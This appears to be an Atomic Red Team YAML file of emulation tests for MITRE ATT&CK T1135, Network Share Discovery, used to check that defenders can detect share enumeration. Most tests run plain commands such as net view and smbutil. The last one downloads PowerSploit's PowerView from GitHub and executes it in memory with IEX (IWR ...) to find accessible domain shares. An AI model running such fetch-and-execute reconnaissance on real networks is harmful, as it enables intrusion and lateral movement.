---
attack_technique: T1135
display_name: Network Share Discovery

atomic_tests:
- name: Network Share Discovery
  auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7
  description: |
    Network Share Discovery

  supported_platforms:
    - macos
    - linux

  input_arguments:
    computer_name:
      description: Computer name to find a mount on.
      type: string
      default: computer1

  executor:
    name: sh
    command: |
      df -aH
      smbutil view -g //#{computer_name}
      showmount #{computer_name}

- name: Network Share Discovery command prompt
  auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb
  description: |
    Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host
    Upon execution avalaible network shares will be displayed in the powershell session
  supported_platforms:
    - windows
  input_arguments:
    computer_name:
      description: Computer name to find a mount on.
      type: string
      default: localhost
  executor:
    name: command_prompt
    elevation_required: false
    command: |
      net view \\#{computer_name}

- name: Network Share Discovery PowerShell
  auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb
  description: |
    Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host
    Upon execution, avalaible network shares will be displayed in the powershell session
  supported_platforms:
    - windows
  input_arguments:
    computer_name:
      description: Computer name to find a mount on.
      type: string
      default: localhost
  executor:
    name: powershell
    elevation_required: false
    command: |
      net view \\#{computer_name}
      get-smbshare -Name #{computer_name}

- name: View available share drives
  auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae
  description:
    View information about all of the resources that are shared on the local computer
    Upon execution, avalaible share drives will be displayed in the powershell session
  supported_platforms:
    - windows
  executor:
    name: command_prompt
    elevation_required: false
    command: |
      net share

- name: Share Discovery with PowerView
  auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd
  description: |
    Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed.

  supported_platforms:
    - windows

  executor:
    name: powershell
    elevation_required: false
    command: |
      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Find-DomainShare -CheckShareAccess -Verbose
